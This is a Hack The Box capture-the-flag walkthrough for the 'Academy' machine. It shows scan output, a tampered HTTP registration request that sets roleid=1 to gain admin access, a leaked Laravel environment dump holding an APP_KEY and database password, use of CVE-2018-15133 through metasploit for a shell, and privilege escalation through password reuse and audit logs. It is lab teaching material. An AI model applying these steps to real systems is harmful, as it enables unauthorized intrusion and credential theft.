Academy HTB

academy11

This is the step by step walkthrough of the Academy Machine on Hack the box . According to Machine Difficulty Rating, it is chategorized at medium difficulty by most fellow haxors

academy12

Will get the machine started and note the ip address

academy

Initial Reconnaisance results :-

[*] Nmap: 22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
[*] Nmap: 80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
[*] Nmap: 33060/tcp open  mysqlx?
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port33060-TCP:V=7.91%I=7%D=12/10%Time=5FD1EA61%P=x86_64-pc-linux-gnu%r(
[*] Nmap: SF:NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b
[*] Nmap: SF:\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPO
[*] Nmap: SF:ptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0
[*] Nmap: SF:b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVer
[*] Nmap: SF:sionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,
[*] Nmap: SF:2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0f
[*] Nmap: SF:Invalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"
[*] Nmap: SF:)%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x0
[*] Nmap: SF:1\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCooki
[*] Nmap: SF:e,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\
[*] Nmap: SF:x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\
[*] Nmap: SF:"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,
[*] Nmap: SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05
[*] Nmap: SF:\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY
[*] Nmap: SF:000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString
[*] Nmap: SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x
[*] Nmap: SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
[*] Nmap: SF:\x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOption
[*] Nmap: SF:s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\
[*] Nmap: SF:x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,
[*] Nmap: SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x
[*] Nmap: SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
[*] Nmap: SF:0")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\
[*] Nmap: SF:0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
[*] Nmap: SF:r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x
[*] Nmap: SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
[*] Nmap: SF:\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");

Ports 20, 80 running there usual services .Have an unusual port 33060 for which nmap couldnt do the service detection . Will start with the port 80 . check whats on the UI

academy ui

its a php web application based around learning thus the name Academy . these names are always very touche . Ran a nikto vulnerability scanner to find more about the website

+ Server: Apache/2.4.41 (Ubuntu)                                                                                                                                                             
+ The anti-clickjacking X-Frame-Options header is not present.                                                                                                                               
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS                                                                    
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type                                    
+ No CGI Directories found (use '-C all' to force check all possible dirs)                                                                                                                   
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.                                                                                                
+ Cookie PHPSESSID created without the httponly flag                                                                                                                                         
+ /config.php: PHP Config file may contain database IDs and passwords.                                                                                                                       
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.                            
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.                             
+ OSVDB-3092: /admin.php: This might be interesting...                                                                                                                                       
+ /login.php: Admin login page/section found.
+ 7786 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2020-12-10 15:26:54 (GMT5.5) (442 seconds)

NIkto discovered privileged pages on the web application . To find how the application is differentiating between privileged and unpriviliged users need a web proxy here to intercept packets going through the app .

Upon analysing the packets saw an interesting field called called roleid while doing the register call for the new user . Just changed that from 0 to 1 . As a result the user that was created was an admin user . Now can access privileged pages

POST /register.php HTTP/1.1
Host: academy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://academy.htb
Connection: close
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=s6k227pb24kmst4cc0v2o5bgj8
Upgrade-Insecure-Requests: 1

uid=dmeg1&password=KYnCMT9ZiMFzncR&confirm=KYnCMT9ZiMFzncR&roleid=1

after logging into the /admin.php can see this page

acadmy-admin

this page tells there is a dev-staging page and has an outstanding issue in it . will add this in the hostfile and try opening this page to see how looks.

dev-staging

Due to a file permission issue laravel is able not open the log file to write and crashing. This is throwing a stak with a dump of all environment variables used in the application . its a treasure trove . will copy everything and see what can be used to exploit

HTTP_HOST	
"dev-staging-01.academy.htb"
HTTP_CONNECTION	
"keep-alive"
HTTP_UPGRADE_INSECURE_REQUESTS	
"1"
HTTP_USER_AGENT	
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"
HTTP_ACCEPT	
"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
HTTP_ACCEPT_ENCODING	
"gzip, deflate"
HTTP_ACCEPT_LANGUAGE	
"en-IN,en-US;q=0.9,en;q=0.8"
PATH	
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
SERVER_SIGNATURE	
"<address>Apache/2.4.41 (Ubuntu) Server at dev-staging-01.academy.htb Port 80</address>"
SERVER_SOFTWARE	
"Apache/2.4.41 (Ubuntu)"
SERVER_NAME	
"dev-staging-01.academy.htb"
SERVER_ADDR	
"10.10.10.215"
SERVER_PORT	
"80"
REMOTE_ADDR	
"10.10.14.4"
DOCUMENT_ROOT	
"/var/www/html/htb-academy-dev-01/public"
REQUEST_SCHEME	
"http"
CONTEXT_PREFIX	
""
CONTEXT_DOCUMENT_ROOT	
"/var/www/html/htb-academy-dev-01/public"
SERVER_ADMIN	
"admin@htb"
SCRIPT_FILENAME	
"/var/www/html/htb-academy-dev-01/public/index.php"
REMOTE_PORT	
"33984"
GATEWAY_INTERFACE	
"CGI/1.1"
SERVER_PROTOCOL	
"HTTP/1.1"
REQUEST_METHOD	
"GET"
QUERY_STRING	
""
REQUEST_URI	
"/"
SCRIPT_NAME	
"/index.php"
PHP_SELF	
"/index.php"
REQUEST_TIME_FLOAT	
1607595624.028
REQUEST_TIME	
1607595624
APP_NAME	
"Laravel"
APP_ENV	
"local"
APP_KEY	
"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG	
"true"
APP_URL	
"http://localhost"
LOG_CHANNEL	
"stack"
DB_CONNECTION	
"mysql"
DB_HOST	
"127.0.0.1"
DB_PORT	
"3306"
DB_DATABASE	
"homestead"
DB_USERNAME	
"homestead"
DB_PASSWORD	
"secret"
BROADCAST_DRIVER	
"log"
CACHE_DRIVER	
"file"
SESSION_DRIVER	
"file"
SESSION_LIFETIME	
"120"
QUEUE_DRIVER	
"sync"
REDIS_HOST	
"127.0.0.1"
REDIS_PASSWORD	
"null"
REDIS_PORT	
"6379"
MAIL_DRIVER	
"smtp"
MAIL_HOST	
"smtp.mailtrap.io"
MAIL_PORT	
"2525"
MAIL_USERNAME	
"null"
MAIL_PASSWORD	
"null"
MAIL_ENCRYPTION	
"null"
PUSHER_APP_ID	
""
PUSHER_APP_KEY	
""
PUSHER_APP_SECRET	
""
PUSHER_APP_CLUSTER	
"mt1"
MIX_PUSHER_APP_KEY	
""
MIX_PUSHER_APP_CLUSTER	
"mt1"
Environment Variables
APP_NAME	
"Laravel"
APP_ENV	
"local"
APP_KEY	
"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG	
"true"
APP_URL	
"http://localhost"
LOG_CHANNEL	
"stack"
DB_CONNECTION	
"mysql"
DB_HOST	
"127.0.0.1"
DB_PORT	
"3306"
DB_DATABASE	
"homestead"
DB_USERNAME	
"homestead"
DB_PASSWORD	
"secret"
BROADCAST_DRIVER	
"log"
CACHE_DRIVER	
"file"
SESSION_DRIVER	
"file"
SESSION_LIFETIME	
"120"
QUEUE_DRIVER	
"sync"
REDIS_HOST	
"127.0.0.1"
REDIS_PASSWORD	
"null"
REDIS_PORT	
"6379"
MAIL_DRIVER	
"smtp"
MAIL_HOST	
"smtp.mailtrap.io"
MAIL_PORT	
"2525"
MAIL_USERNAME	
"null"
MAIL_PASSWORD	
"null"
MAIL_ENCRYPTION	
"null"
PUSHER_APP_ID	
""
PUSHER_APP_KEY	
""
PUSHER_APP_SECRET	
""
PUSHER_APP_CLUSTER	
"mt1"
MIX_PUSHER_APP_KEY	
""
MIX_PUSHER_APP_CLUSTER	
"mt1"
Registered Handlers
0. Whoops\Handler\PrettyPageHandler

taking out important shit from the dump.

SERVER_ADMIN	
"admin@htb"
SCRIPT_FILENAME	
"/var/www/html/htb-academy-dev-01/public/index.php"
REMOTE_PORT	
"33984"
GATEWAY_INTERFACE	
"CGI/1.1
APP_KEY

probably the cgi server itself is running on 33984 . couldnt directly reach from browser. said connection refused . could probably use from proxying through like the web server .

since the app key is there will use CVE-2018-15133 exploit with metasploit to get a shell.

In Laravel Framework through 5.5.40 and 5.6.x through 5.6.29, remote code execution might occur as a result of an unserialize call on a potentially untrusted X-XSRF-TOKEN value. This involves the decrypt method in Illuminate/Encryption/Encrypter.php and PendingBroadcast in gadgetchains/Laravel/RCE/3/chain.php in phpggc. The attacker must know the application key, which normally would never occur, but could happen if the attacker previously had privileged access or successfully accomplished a previous attack.

which this case , we have .

user-1

got in as www-data now have to do privilege escalation

in the /var/www/html/academy folder got the laravel dir. .env has all the environment variables. got db password here . since the planner told us cry0l1t3 wrote the modules he probably used the same password for his account as the db pass
and boom am in
user-2
have to do privilege escalation
since the user doesnt have sudoers permission it says the command will be logged .
command

its logged in /var/log/auth/
checked for any command with su in the file and extracted the data
data
converted the hex key to string and got password for mrb3n